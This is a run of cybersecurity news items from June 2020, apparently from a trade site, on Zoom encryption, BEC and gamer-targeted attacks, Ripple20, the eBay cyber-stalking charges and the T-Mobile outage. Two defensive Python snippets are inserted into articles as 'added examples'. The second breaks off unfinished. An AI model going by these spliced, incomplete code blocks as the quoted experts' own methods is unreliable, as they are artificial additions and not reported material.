Info Security


Zoom Will Offer End-to-End Encryption for All Users

Thu, 06/18/2020 - 08:24

Zoom has reversed its controversial decision to restrict access to end-to-end encryption (E2EE) for some users and will now offer the feature to customers of both its free and premium services.

The video conferencing app said it had consulted with rights groups, child safety advocates, government representatives, encryption experts and its own CISO council to gather feedback.

“We are also pleased to share that we have identified a path forward that balances the legitimate right of all users to privacy and the safety of users on our platform,” the firm's CEO Eric Yuan said in a blog post yesterday.

“This will enable us to offer E2EE as an advanced add-on feature for all of our users around the globe – free and paid – while maintaining the ability to prevent and fight abuse on our platform.”

Users of the free service will be required to authenticate in a one-off process with information such as their phone number, in order for the platform to “reduce the mass creation of abusive accounts,” Yuan added.

The news came as rights groups, tech firms and internet users petitioned the firm to reverse its policy on E2EE.

They argued that E2EE is too important to be a premium feature, especially in the context of global protests against racial injustice and government oppression. The technology protects activists, journalists and other vulnerable parts of the population from government repression and surveillance, as well as from cyber-criminals, they said.

The campaigners also argued that those who want to disguise malicious intent or illegal activity can simply pay for the premium service.

Yuan was reported saying on an analyst call earlier this month that the firm would not be offering free users E2EE “because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose.”

Mozilla welcomed the news. The tech non-profit, which wrote an open letter to Zoom earlier in the week signed by tens of thousands of internet users, argued that E2EE should always be the default setting, not a luxury.

“We're heartened that Zoom listened to consumers, especially at a time when millions of people are relying on the platform to stay connected amid the pandemic and to organize in support of Black lives,” it said in a statement.

“Zoom’s decision is part of an emerging trend: Consumers are demanding more of the technology products and services they use every day. And companies are changing their products to meet these demands.”

Categories: Cyber Risk News

BEC Attackers Ditch C-Suite in Favor of Fresh Target

Wed, 06/17/2020 - 18:11

The number of Business Email Compromise (BEC) attacks being leveled at C-Suite executives has declined as threat actors focus on a new target.

According to new research published today by Abnormal Security, BEC attacks on C-Suite executives decreased by 37% in the first quarter of 2020 compared to the final quarter of 2019. 

Researchers discovered that cyber-criminals had a new springtime victim in their sights, as BEC attacks on finance employees—who hold the key to routine payments—shot up by more than 87%. 

The Abnormal Security Quarterly BEC Report for Q1 2020 notes a shift away from individual attacks to group BEC attacks. Campaigns with more than 10 recipients increased by 27% quarter over quarter.

Researchers found that criminals had switched their focus away from paycheck and engagement fraud and toward payment fraud. Invoice fraud attacks were found to have increased more than 75%.

A section of the report was devoted to trends around email account compromise and security attack patterns observed during the COVID-19 pandemic. 

Evan Reiser, CEO and co-founder of Abnormal Security, described the attacks related to the outbreak of the novel coronavirus as "among the most sinister in intent that we have ever seen."

Researchers found that COVID-related attacks more than quadrupled between the second and third weeks of March 2020. Cyber-assaults increased 436%, with an average 173% week-over-week increase during the quarter.

COVID-19 vectors exploited by criminals included vaccines, PPE equipment, stimulus checks, PPP payments, layoff concerns, and the popularity of video conferencing tools. 

The majority of the coronavirus attacks Abnormal caught were scams that leveraged trusted entities, using compromised and spoofed accounts in order to scam users and companies out of money, steal their credentials, or install malware on their device.

“The email security trends we witnessed during Q1 are most certainly related to the COVID-19 pandemic and the shift to work from home, but they also reflect greater sophistication and attack strategy by threat actors,” said Reiser. 

“By increasing campaign target size, attackers increase the opportunity for social validity and by targeting finance employees who manage third-party payments, they’ve found a new vector for payouts.”


Sharp Rise in Web Attacks on Gamers

Wed, 06/17/2020 - 17:33

Cyber-criminals stepped up their efforts to victimize gamers while millions of people stayed at home this spring to slow the spread of COVID-19.

New research published today by Kaspersky found that in April, the daily number of blocked attempts to direct users to malicious gaming-themed sites increased by 54%, compared to January 2020.

In the same month, the number of blocked attempts to force gamers onto phishing pages for one of the most popular gaming platforms also increased by a whopping 40% compared to February 2020. 

Kaspersky researchers took a special interest in threats to gamers after lockdown measures saw millions turn to video games as a source of entertainment. Beginning in March, online gaming platform SteamDB saw a record number of users, with 20.3 million people in-game simultaneously over one weekend. 

According to data from Kaspersky Security Network, cyber-criminals have exploited the increased interest in video games to launch various attacks. 

Minecraft, one of the most popular games ever made, was the title most often used by threat actors. Its name featured in more than 130,000 web attacks. The other games used most frequently to launch attacks were Counter-Strike: Global Offensive and The Witcher 3.

Maria Namestnikova, security expert at Kaspersky, said threat actors used the promise of cheats to lure gamers into clicking malicious links. 

“The past few months have shown that users are highly susceptible to falling for phishing attacks or clicking on malicious links when it comes to games—whether they’re looking to find pirated versions or eager for a cheat that will help them win,” said Namestnikova.

Yury Namestnikov, also a security expert at Kaspersky, said that gamers working from home who play and toil on the same device should be particularly wary of cyber-threats.

“Now that many players started using the same machines that they use to enter corporate networks for games, their cautiousness should be doubled: risky actions make not only personal data or money vulnerable but also corporate resources,” said Namestnikov.

Kaspersky researchers urged gamers to protect themselves by using strong passwords and two-factor authentication where possible and to be wary of any cheats and pirated copies of video games.


Illinois Tech CEO Charged with #COVID-Relief Fraud

Wed, 06/17/2020 - 16:47

The founder and CEO of two Illinois software companies has been charged with fraudulently claiming over $400,000 from the Paycheck Protection Program (PPP).

Evanston resident Rahul Shah allegedly lied on an application for a forgivable bank loan guaranteed by the Small Business Administration (SBA) under the Coronavirus Aid, Relief, and Economic Security (CARES) Act.

The 51-year-old was charged in a federal criminal complaint filed in the Northern District of Illinois with bank fraud and making false statements to a financial institution.  

Shah is the founder and CEO of tech companies Boardshare LLC and Katalyst Technologies, Inc. Both companies are based on Davis Street in downtown Evanston. 

Katalyst, which was founded in 2000, also has offices in Atlanta, London, and in several cities in India. 

Shah applied for a PPP loan from Bank of Texas on April 15 for Katalyst. On April 30, he applied for a second loan on behalf of N2N Holdings LLC, which operates under the name Boardshare.

According to the Department of Justice (DOJ), Shah "significantly overstated the payroll expenses of a company that he controlled" and submitted falsified IRS documents to the lender. 

On an IRS 1099-MISC form, Shah claimed that one of his companies had made payments to several individuals. These claims turned out to be false upon investigation.

In addition, Shah misrepresented his company's payroll expenses for 2019 in documents that he signed and caused to be submitted to the lender.

"A comparison between the documents submitted to the lender and the company’s IRS filings revealed that Shah’s company reported significantly lower payroll expenses to the IRS," said a spokesperson for the DOJ. 

An affidavit from James Sams, an agent with the Treasury Inspector General for Tax Administration, said Shah paid Boardshare's employees less than $10k over a period in which he claimed to have spent $426k on payroll. 

In an interview with FBI and Treasury agents on May 29, Sams alleges that Shah acknowledged that there were "errors" in his application and blamed them on employees in India. 

If convicted of both counts, Shah could face a sentence ranging from probation to up to 60 years in federal prison.


Widespread Security Vulnerabilities in Mobile Banking Apps

Wed, 06/17/2020 - 14:31

Half of mobile banks are vulnerable to fraud and theft of funds due to inadequate security on apps, according to a study by Positive Technologies. The analysis found that mobile banking applications have a raft of security flaws which can be exploited by cyber-criminals to access sensitive data and commit fraud.

Positive Technologies said that none of the 14 mobile banking applications tested had an acceptable level of security. In regard to the applications installed by clients, 43% were shown to store important information on the phone in clear text, making the data at risk of being accessed by an unauthorized party. In addition, 76% of the vulnerabilities can be exploited without physical access to the device and over one-third can be exploited without administrator rights.

Each mobile bank analyzed had an average of 23 vulnerabilities on the server side, which contained 54% of all the vulnerabilities found. Close to half (43%) had server-side vulnerabilities in business logic, which attackers can use to access sensitive user information and commit fraud. The report also stated that hackers can steal user credentials in five out of seven mobile banks while card information is at risk in one-third.

There were also variations in the types of security flaws between iOS and Android apps: in iOS, no flaws were rated above ‘medium,’ whereas in Android, 29% were ‘high risk.’

Olga Zinenko, analyst at Positive Technologies, commented: “Banks are not protected from reverse engineering of their mobile apps. Moreover, they give short shrift to source code protection, store sensitive data on mobile devices in clear text and make errors allowing hackers to bypass authentication and authorization mechanisms and bruteforce user credentials. Through these vulnerabilities, hackers can obtain usernames, account balances, transfer confirmations, card limits and the phone number associated with a victim’s card.

“We urge that banks do a better job of emphasizing application security throughout both design and development. Source code is rife with issues, making it vital to revisit development approaches by implementing SSDL practices and ensuring security at all stages of the application lifecycle.”

Just last week, the FBI warned that cyber-criminals are seeking to take advantage of the growing use of mobile banking apps during COVID-19.


Petitions Demand Zoom Changes End-to-End Encryption Stance

Wed, 06/17/2020 - 11:20

Technology companies and rights groups are calling on Zoom to reverse its stance on end-to-end encryption, which currently denies users of its free service the strongest possible security and privacy protections.

The video conferencing app controversially announced earlier this month that only users of its premium service would have their conversations protected by end-to-end encryption.

“Free users for sure we don’t want to give [end-to-end encryption] because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” CEO Eric Yuan reportedly said.

Now a coalition of non-profits, tech groups and tens of thousands of internet users have called on the firm to change its mind.

An open letter to Yuan from the EFF and Mozilla, signed by over 19,000 internet users, argued that offering the strongest possible security to all users is more important now than ever, at a time when political activists and protesters may be the target of government surveillance.

“Best-in-class security should not be something that only the wealthy or businesses can afford. Zoom’s plan … will leave exactly those populations that would benefit most from these technologies unprotected,” it noted.

“Around the world, end-to-end encryption is already an important tool for journalists and activists that are living under repressive regimes and fighting censorship. We recognize that Zoom's business model includes offering premium features for paid accounts, but end-to-end encryption is simply too important to be one of those premium features.”

A separate petition sent to the firm by Fight for the Future, Daily Kos, MPower Change, Mijente, Kairos, Media Alliance and Jewish for Peace has garnered over 50,000 signatures.

It claimed that Yuan’s defense of the decision, that the firm wanted to help law enforcement, was absurd.

“People with bad intentions can just pay for the account to ensure their calls are secure,” it argued. “Meanwhile, people who can’t afford Zoom’s services are left vulnerable to cyber-criminals, stalkers and hackers.”

Zoom’s recent admission that it suspended the accounts of Chinese human rights activists after a request from Beijing will only add further weight to the calls.


Avast Appoints Nick Viney to Lead Telco, IoT and Family Security Business Unit

Wed, 06/17/2020 - 10:30

Global digital security and privacy product provider Avast has announced the appointment of Nick Viney as senior vice-president and general manager for its Telco, Internet of Things (IoT) and Family security business unit.

Viney joins Avast from Cyber 1 – a publicly listed enterprise cybersecurity provider – where he was Group CEO. He has previously held roles at McAfee, Google and Microsoft.

In his new role, he will oversee Avast’s global strategy and lead the development of the company’s position in smart home security while expanding its overall portfolio of security products and partners including telecommunications providers and original equipment manufacturers.

“Avast is a company I have long admired for its commitment to innovation, focus on the customer and for its mission to make the world a safer place for everyone, particularly the most vulnerable in our society,” said Viney.

“These are values I have stood by throughout my entire career and I’m looking forward to leading some important projects for the company that are tackling real-world cybersecurity problems and issues for consumers today.”


Aerospace Executives Targeted Via LinkedIn Recruitment Messages

Wed, 06/17/2020 - 10:00

Attackers leveraged LinkedIn and posed as recruiters in order to steal information and money from European military and aerospace executives.

According to new research from ESET, the technique involved threat actors contacting the executives via LinkedIn while posing as recruiters. Named Operation In(ter)ception, the activity took place from September to December 2019 and began with what ESET called “a quite believable job offer, seemingly from a well-known company in a relevant sector,” delivered as a OneDrive link to a PDF document with salary information related to the fake job offer.

However, ESET malware researcher Dominik Breitenbacher said malware was silently deployed on the victim’s computer giving the attacker “an initial foothold and reached a solid persistence on the system.”

Among the tools the attackers utilized was custom multistage malware that often came disguised as legitimate software, and modified versions of open-source tools.

Speaking on ESET’s Virtual World conference this week, head of threat research, Jean-Ian Boutin, said the job offer was often “too good to be true” and while the conversation would start out as friendly, the attacker would pressure the executive to answer questions more and more rapidly. The attacker would also ask what system the executive was using in order to determine configurations.

Boutin said the PDF file was a decoy, which featured positions with expected salaries. However, the executable delivered alongside it created a scheduled task on the victim’s computer, using built-in Windows functionality, so that the payload is launched automatically. “This can be very useful in an enterprise set up, but is also a common technique used by threat groups to ensure their malicious payload is run periodically once it is installed,” he said.

He explained that the malicious payload in the scheduled task is used by the attacker to connect to an external server “and is able to download and execute arbitrary content.”

Post-attack, Boutin said all of the exfiltrated data was placed in password-protected RAR archives, and uploaded to Dropbox using a command line tool. “What made this threat actor difficult to track was that their operators were really careful and cleaned up their traces when moving from one system to another,” he said. The attackers also removed the LinkedIn profiles once the compromise was successful.

During the research, ESET also determined some similarities with actions by the Lazarus group, who had been attributed as being involved with the Sony Pictures attack and the WannaCry outbreak. Whilst ESET said there was not enough information to definitely attribute these attacks to the Lazarus Group, there were some similarities in the code and tactics used.

In a comment sent to Infosecurity, Paul Rockwell, head of trust and safety at LinkedIn, said: “We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies.

“Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service.

“In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.”


#COVID19 Forces Positive Long-Term Changes to Cybersecurity

Wed, 06/17/2020 - 09:30

COVID-19 lockdowns around the world have led to an increase in some of the most common attack types, but also a realization that businesses must change going forward, according to over 80% of IT professionals polled by Bitdefender.

The security vendor interviewed 6724 security and IT staff in May across the UK, US, Australia/New Zealand, Germany, France, Italy, Spain, Denmark and Sweden, covering all sizes of organization.

Some 86% claimed attacks had increased during lockdown, especially phishing (26%), ransomware (22%), social media threats/chatbots (21%), cyber-warfare (20%), Trojans (20%) and supply chain attacks (19%). In some cases, such as ransomware (31%) and DDoS (36%), the increase in the volume of attacks was in the double digits.

Around a third (34%) of respondents warned that home working employees were too relaxed about security, leading to concerns over phishing (33%) and accidental data leaks (31%). A third claimed home workers aren’t following protocol by identifying and flagging suspicious activity.

Other risks from remote working highlighted by respondents include third parties using corporate laptops and devices (38%) and the use of personal messaging services for work (37%).

Unsurprisingly, half (50%) said they had no contingency plan in place for a scenario such as COVID-19.

However, on the positive side, global organizations are taking proactive steps to improve cybersecurity readiness and resilience going forward.

Over a fifth (22%) said they’ve started providing VPN and made changes to VPN session lengths, 20% have shared cybersecurity guides and deployed pre-approved applications and content filtering, and 19% have updated employee training.

Almost a third (31%) said they intend to keep 24/7 IT support once the pandemic recedes and will increase security training. Even better, 23% said they’re going to increase cooperation with key business stakeholders when drawing up cybersecurity policies, and a similar number will increase outsourcing of IT security functions.

Liviu Arsene, global cybersecurity researcher at Bitdefender, argued that customer loyalty, trust and the bottom line are at risk if organizations don’t get cybersecurity right during the pandemic, and beyond.

“COVID-19 has however presented infosec professionals with the opportunity to reassess their infrastructure and refocus on what end users/employees really need and want in terms of cybersecurity support,” he added.

“It is also evident that, despite identifying risks, there is still a need for further investigation into what investments need to be made to ensure that corporate data and employees are both safe from bad actors. While it’s a challenge to make changes now, it will shore up business for the future and many more unknown scenarios.”


CIA Report Slammed Agency’s Security as “Woefully Lax”

Wed, 06/17/2020 - 08:40

A US senator is demanding to know why the CIA is still not following the government’s advice on best practices after he obtained a 2017 report describing the agency’s day-to-day cybersecurity as “woefully lax.”

The internal report was written by the CIA’s WikiLeaks Task Force in the wake of the Vault 7 disclosures to the whistleblowing site, which amounted to the “largest data loss” in its history.

At least 180GB and potentially as much as 32TB of information, including data on a range of cyber-weapons, was stolen by an insider in 2016. The CIA said it didn’t know how much data was taken because there were no safeguards such as user monitoring on the Center for Cyber Intelligence software development network (CCI DevLAN), where much of it was stored.

Democrat senator Ron Wyden on Tuesday wrote to the director of national intelligence, John Ratcliffe, warning that the agency was still lagging behind on implementing even basic cybersecurity used widely elsewhere in federal government.

This includes DMARC to help prevent phishing and email impersonation, and multi-factor authentication for the CIA’s .gov domains and the Joint Worldwide Intel Communications System (JWICS), which is used for top secret comms in the US intelligence community.

According to the report, the CCI had for many years “prioritized building cyber-weapons at the expense of securing their own systems.

“Most of our sensitive cyber-weapons were not compartmented, users shared systems administrator-level passwords, there were no effective removable media controls and historical data was available to users indefinitely,” it continued.

“CCI focused on building cyber-weapons and neglected to also prepare mitigation packages if those tools were exposed. These shortcomings were emblematic of a culture that evolved over the years that too often prioritized creativity and collaboration at the expense of security.”

The irony, said Wyden, is that the intelligence community was not formally required to implement specific security policies mandated to other federal agencies by the Department of Homeland Security (DHS), as it was assumed that it would go “above and beyond.”

Fausto Oliveira, principal security architect at Acceptto, argued that the Department of National Intelligence budget runs into the tens of billions, which should allow the CIA to address the concerns raised by Wyden.

“Based on the findings of the report, it appears that there was a lack of IT and cybersecurity governance that led to a lax adoption of security controls,” he added.

“It is not an operational matter, it is a matter of the agency's management not setting the right goals to manage the risks associated with operating an organization, specifically an organization that is a desirable target for all kinds of attackers.”


Ripple20 Vulnerabilities Affect Hundreds of Millions of IoT Devices

Tue, 06/16/2020 - 17:06

Zero-day vulnerabilities have been discovered that could impact millions of IoT devices found in data centers, power grids, and elsewhere.

The flaws, dubbed Ripple20, were detected by the JSOF research lab in a widely used low-level TCP/IP software library developed by Treck, Inc. In research published today, JSOF said Ripple20 includes multiple remote code execution vulnerabilities and affects "hundreds of millions of devices (or more)."

Researchers named the vulnerabilities Ripple20 to reflect the widespread impact they have had as a natural consequence of the supply chain "ripple-effect" that has seen the widespread dissemination of the software library and its internal flaws.

"A single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies, and people," wrote researchers.

Ripple20 reached critical IoT devices involving a diverse group of vendors from a wide range of industries. Affected vendors range from one-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, and Baxter.

Researchers said many other major international vendors are suspected of being vulnerable in the medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries. 

"The risks inherent in this situation are high," wrote researchers. "Data could be stolen off of a printer, an infusion pump behavior changed, or industrial control devices could be made to malfunction." 

By exploiting the flaws, an attacker could hide malicious code within embedded devices for years. One potential risk scenario is that a threat actor could broadcast an attack capable of taking over all impacted devices in the network simultaneously. 

"This is a classic case of finding critical vulnerabilities in embedded IoT devices that were designed years ago and may now be impossible or impractical to patch," commented Phil Neray, VP of IoT & industrial cybersecurity at CyberX.

"The best strategy is to implement compensating controls such as network segmentation to make it harder for adversaries to connect to these devices, plus Network Traffic Analysis (NTA) with Security Orchestration, Automation, and Response (SOAR) to quickly spot anomalous behavior—and stop it—before they cause a safety incident, shut down production, or steal intellectual property."


Wiggle Investigates Cyber-Attack

Tue, 06/16/2020 - 16:24

Online sports retailer Wiggle is investigating a suspected cyber-attack after receiving a series of complaints from customers.

Concerns were raised after customers received emails confirming orders for items from Wiggle that they had not placed. The suspicious orders were set to be delivered to addresses that the confused customers did not recognize. 

The idea that Wiggle had been hit by a possible cyber-attack was first mooted on June 12. One customer reached out to a cycling news site after failing to elicit a response from Wiggle regarding a £30 order charged to his account that he said was not made by him.

Another Wiggle customer, Kobi Omenaka, took to Twitter to complain that he had received no response from the retailer after informing them that an imposter had used his account to purchase a £237.50 skin-tight cycling suit in dark steel blue. 

Along with an attachment of the order confirmation, Omenaka posted "@Wiggle_Sport someone broke into my account and ordered this. I told customer services as it happened but no one has come back to me."

Twitter user George Slokoski responded to Omenaka's tweet, saying that he had also experienced issues with his Wiggle account.

"Mine also hacked this AM," wrote Slokoski. "Got an email saying my email address has changed to and shortly after I had a charge for £5."

Another user, Harry Holmes, tweeted, "The same happened to me!" and asked Omenaka if his fake order was also being sent to an address in Twickenham, London.

On June 14, another customer, who uses the handle @hayleybadger on Twitter, tweeted the store: "@Wiggle_Sport Are you under cyber attack? I've received an email to say someone's changed my account to their email address and I can’t access your website."

Wiggle responded to the tweet above with an invitation to discuss the matter over live chat. 

Twitter user @Omidpyc claims Wiggle has been aware of a cybersecurity breach for over ten days but has not gone public with the news.

Earlier today he tweeted: "Just had a call from Ross Clemmons. He says Wiggle are going to put out an announcement (Crossed fingers) and apologized for their dire response over the weekend."

According to @Omidpyc, Clemmons "agreed customer account flow was insecure and it’s been reported to ICO."


eBay Executives Charged With Cyber-Stalking Critics

Tue, 06/16/2020 - 15:47

Six senior eBay employees have been charged with intimidating and cyber-stalking the couple behind an online newsletter whose media coverage they didn't like.

The executives, who no longer work for the online marketplace, allegedly sent a stream of terrifying deliveries to the homes of the newsletter's editor and publisher and their neighbor. Sinister deliveries received by the couple over a period of weeks included a bloody pig mask, a wreath of funeral flowers, and live spiders and cockroaches. 

Pornographic magazines with the husband's name on them were sent to the house of one of the couple's neighbors in Natick, Massachusetts. In addition, officials said that a plot had been hatched by the executives to break into the garage of the alleged victims and fit a GPS tracking device to their vehicle. 

The former executives allegedly launched their prolonged campaign of terror after a newsletter run by the couple published a piece concerning some litigation in which eBay was embroiled. 

It is further alleged that the executives created fake social media accounts that they used to send the couple a series of threatening messages and post about phony events happening at the couple's home address. 

“This was a determined, systematic effort by senior employees of a major company to destroy the lives of a couple in Natick all because they published content that company executives didn’t like," said Massachusetts US attorney Andrew Lelling.

"For a while they succeeded, psychologically devastating these victims for weeks as they desperately tried to figure out what was going on and stop it."

Court documents reveal that one member of eBay's executive team directed the company's former senior director of safety and security, James Baugh, to "take her down," referring to the newsletter's editor. 

Baugh, of San Jose, California, and eBay’s former director of global resiliency, David Harville, of New York City, are charged with conspiracy to tamper with witnesses and conspiracy to commit cyber-stalking.

Other former eBay employees charged in relation to the alleged cyber-stalking are Stephanie Popp, former senior manager of global intelligence; Stephanie Stockwell, former manager of eBay’s Global Intelligence Center; Brian Gilbert, former senior manager of special operations for eBay’s Global Security Team; and Veronica Zea, a former eBay contractor who worked as an intelligence analyst in the Global Intelligence Center.

Categories: Cyber Risk News

ESET CTO: AI Can Work With Correct Human Intervention

Tue, 06/16/2020 - 15:06

AI and machine learning technologies need training and human intervention to work as expected.

Speaking as part of ESET’s Virtual World event, CTO Juraj Malcho said there are perceptions that AI is evil or mysterious, but “it is not magic, not self-aware and it is invented and programmed by humans; it doesn’t have any obscure intentions” and it relies on inputs.

“There are some companies out there that claim they have magic solutions, but that is not the case,” he said. “I like to say it is advanced computer-assisted automation.” He admitted that, whilst that made it sound uninteresting, “it is a beautiful thing if you look under the hood”: for many decades we did not have the computers and technology to make use of machine learning capabilities, but we now have ways to apply them.

Citing an example of how automation can be used in malware detection, Malcho said unique clusters of malware samples are often classified by common traits. He referred to a case in which ESET had detected 7.7 million Emotet attacks; because the company was able to classify them with machine learning under a single DNA detection, three million attacks were discovered “thanks to us seeing common traits of a family.”

Malcho admitted that machine learning is not always accurate, but it is a fast way to detect, and “accuracy is best when you have a human involved and work hand in hand.” Machine learning also comes with challenges, he added: when you feed it with data, “you may find you don’t have the capacity of your computing systems to process all of the data.”

This requires a hybrid approach, where you pre-select the samples and train your models. “The trick here is to have it balanced, as if the model is imbalanced and not representing the real world properly, you are basically getting junk in and the result is junk out,” he said.
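The family-by-common-traits idea and the balance check Malcho describes, as an added example rather than ESET's own code: a family signature is derived as the traits shared by every labelled member of the family and not seen in any sample outside it, unknown samples are attributed when they carry all of those traits, and the label split of the training set is reported so an imbalanced set is visible before training. The sample names, trait strings and labels are constructed for illustration, not real malware data.

```python
"""Family detection from shared traits, as described in the talk above."""
from collections import Counter

# Constructed "samples" for illustration, not real ESET data: each sample is
# the set of traits an analysis pipeline might extract (imported APIs,
# section names, strings). Family labels are assumed to be analyst-assigned.
SAMPLES = {
    "emotet_1": {"CreateProcessW", "WinHttpOpen", "CryptDecrypt", "sect:.rsrc", r"str:%s\%s.exe"},
    "emotet_2": {"CreateProcessW", "WinHttpOpen", "CryptDecrypt", "sect:.text", r"str:%s\%s.exe"},
    "emotet_3": {"CreateProcessW", "WinHttpOpen", "CryptDecrypt", "str:Mozilla/4.0", r"str:%s\%s.exe"},
    "clean_1": {"CreateProcessW", "MessageBoxW", "sect:.text"},
    "clean_2": {"WinHttpOpen", "MessageBoxW", "sect:.rsrc", "str:Mozilla/4.0"},
}
LABELS = {"emotet_1": "emotet", "emotet_2": "emotet", "emotet_3": "emotet",
          "clean_1": "clean", "clean_2": "clean"}


def family_signature(samples, labels, family, min_support=1.0):
    """Traits present in at least `min_support` of the family's samples, minus
    any trait that also occurs in a sample outside the family (so the
    signature cannot fire on clean software in the training set)."""
    members = [samples[s] for s in samples if labels[s] == family]
    others = [samples[s] for s in samples if labels[s] != family]
    counts = Counter(t for m in members for t in m)
    common = {t for t, c in counts.items() if c / len(members) >= min_support}
    seen_elsewhere = set().union(*others) if others else set()
    return common - seen_elsewhere


def matches(sample_traits, signature):
    """A sample is attributed to the family when it carries every signature trait."""
    return bool(signature) and signature <= set(sample_traits)


def class_balance(labels):
    """Share of each label in the training set. A lopsided split is the
    'junk in, junk out' situation the speaker warns about."""
    counts = Counter(labels.values())
    total = sum(counts.values())
    return {label: n / total for label, n in counts.items()}


if __name__ == "__main__":
    sig = family_signature(SAMPLES, LABELS, "emotet")
    print("emotet signature:", sorted(sig))
    print("training balance:", class_balance(LABELS))
```

With the constructed data the Emotet signature reduces to the two traits that no clean sample shares; lowering `min_support` admits traits carried by only part of the family, which widens coverage at the cost of more analyst review of the matches.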

Consideration also has to be given to the malicious use of automation, he continued: it can be used to generate and distribute spam and phishing, and, Malcho noted, automation is also commonly used for language translation.

He also claimed that attackers can use it to detect intruders in their infrastructure, identify patterns in generated content, create false flags and choose the best targets and attack methods.

Concluding, Malcho said that AI “is far from 'Skynet' and trying to control us, it is just a tool that we have at our disposal” and it depends on how well you are able to use it.

He said: “AI without data is just beautiful math, and data without AI is basically just a bunch of ones and zeros. One doesn’t exist without the other. So when the perfect combination of these elements is achieved and properly validated data is fed into the properly-designed systems, a euphoric moment is created.”

Categories: Cyber Risk News

46% of SMEs Sharing Confidential Files by Email During Lockdown

Tue, 06/16/2020 - 14:16

Nearly half (46%) of small and medium-sized enterprises (SMEs) regularly share confidential files via email, including financial and employee data in spreadsheets, according to a new study from the Lanop Accountancy Group. At the same time, 60% have not upgraded their organizations’ cybersecurity capabilities since shifting to remote working during COVID-19.

In a survey of 100 owners of SMEs based in London, UK, which focused on their security habits during the pandemic, 59% said they had seen an increase in phishing emails since lockdown began.

Cybersecurity expert Tim Sadler, CEO of Tessian, said: “Protecting people on email has to be a priority in this new hybrid world where employees can work from anywhere. All it takes is one simple mistake or typo for sensitive and confidential files to land in the wrong inbox and for a company to suffer a significant data breach.”

SMEs also outlined IT difficulties they have faced as a result of moving to a remote working model. A quarter said they share a Zoom account with another company, and one in five have been forced to cancel a meeting due to conference systems crashing. Meanwhile, 30% reported purchasing additional laptops, mobiles and tablets to manage remote working.

In addition, one third of company owners don’t believe they have the IT systems to continue remote working for a further three months, while 28% said their staff lack the digital skills to work from home.

Lanop also found nearly half (45%) plan to increase their IT spending in the near future, while 23% will not renew their office lease beyond the crisis.

Sridhar Iyengar, managing director of Zoho Europe, added: “The COVID-19 crisis has forced the majority of business owners to quickly implement remote working systems in order to continue trading despite strict lockdown measures. For many companies, successfully managing urgent projects, team meetings and company finances online against the backdrop of economic turmoil has brought with it a myriad of delays.”

A survey published last month by Bitglass found that most organizations are not sufficiently prepared to securely support remote working, even though 84% intend to continue this practice beyond the crisis.

Categories: Cyber Risk News

New Fake Ad Alert System Launched to Fight Online Scams

Tue, 06/16/2020 - 12:15

A new system to detect and remove scam adverts from the internet has been launched in the UK.

As reported by ITV, the UK Scam Ad Alert tool – set up by the Advertising Standards Authority (ASA) and the Internet Advertising Bureau (IAB) with support from digital ad platforms and tech giants – will allow people to report scam ads which appear in paid-for spaces online.

The ASA will then circulate details of the ads, remove them and suspend the advertiser’s account where possible. The ASA said that the system has been launched in response to a concerning growth in online fraud and the financial harm it can cause.

ASA chief executive Guy Parker said: “The overwhelming majority of ads responsibly inform and entertain their audience, but a small minority are published with criminal intent.

“Our Scam Ad Alert system will play an important part in helping detect and disrupt these types of scams. By working closely with our partners such as Google and Facebook we can act quickly to have problem ads taken down as part of our ongoing work to better protect consumers online.”

However, Jake Moore, cybersecurity specialist at ESET, pointed out that, whilst such alert systems can help fight online scams, user awareness also plays a big part in detecting and stopping scams from being successful.

“Users need all the help they can get in a space where scam adverts are rife. However, a scam alert system only works when people correctly identify a misleading advert and they are taken down quickly enough before others are unfortunate enough to click into them. Similar to reporting abuse on social media, the efficiency of such systems is all down to the speed with which they can be effective.

“This is at the very least a step in the right direction, but the best approach is to teach the users about awareness and how to spot a fraudulent advert. Such clues lie in poor stylistics, bad grammar and strange looking links when hovering over the advert or long clicking on it.”

Categories: Cyber Risk News

Global DDoS Attack Dismissed as T-Mobile Misconfiguration

Tue, 06/16/2020 - 10:35

Claims of a global DDoS attack have been dismissed, with evidence showing it was caused by a misconfiguration.

The issue was apparently caused by a misconfiguration at T-Mobile in the US. Mike Sievert, CEO of T-Mobile, said in a statement published at 8:45pm PT that the company had “been experiencing a voice and text issue that has intermittently impacted customers in markets across the US”, which started just after 12pm EDT and continued through the day.

“This is an IP traffic-related issue that has created significant capacity issues in the network core throughout the day,” Sievert said. “Data services have been working throughout the day and customers have been using services like FaceTime, iMessage, Google Meet, Google Duo, Zoom, Skype and others to connect.

“I can assure you that we have hundreds of our engineers and vendor partner staff working to resolve this issue and our team will be working through the night as needed to get the network fully operational.”

T-Mobile claimed on Twitter that it was a “widespread routing issue affecting voice & text” and this affected customers around the country.

Despite regular updates and clarifications, claims circulated that a global DDoS attack was taking place. Some claimed that brands including Sprint, AT&T, Verizon, Comcast, Fortnite, Instagram and Chase Bank were affected, while a widely shared attack map appeared to show a large flow of attack traffic coming from the US.

However, Cloudflare CEO Matthew Prince dismissed claims of a DDoS attack, saying in a Twitter thread that he saw the issue with T-Mobile “making some changes to their network configurations today” and “unfortunately, it went badly” as the result was six hours “of cascading failures for their users.”

Prince added: “This is no massive DDoS attack. First, traffic from WARP to supposedly impacted services is normal and has no increase in errors. Second, there is no spike in traffic to any of the major internet exchanges, which you do see during actual DDoS attacks and definitely would see during one allegedly this disruptive.”
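The two signals Prince relies on, as an added triage example that is not Cloudflare's tooling: a volumetric attack large enough to take down several carriers would push traffic at a major internet exchange well outside its baseline and raise the error rate on requests to the supposedly attacked services, whereas a routing or configuration failure leaves both flat even while users cannot connect. The baseline readings, the z-score thresholds and the verdict labels are assumptions for the example.

```python
"""Outage-versus-DDoS triage on exchange-point traffic and error rate."""
from statistics import mean, pstdev

# Constructed per-minute readings for a quiet baseline (not Cloudflare data):
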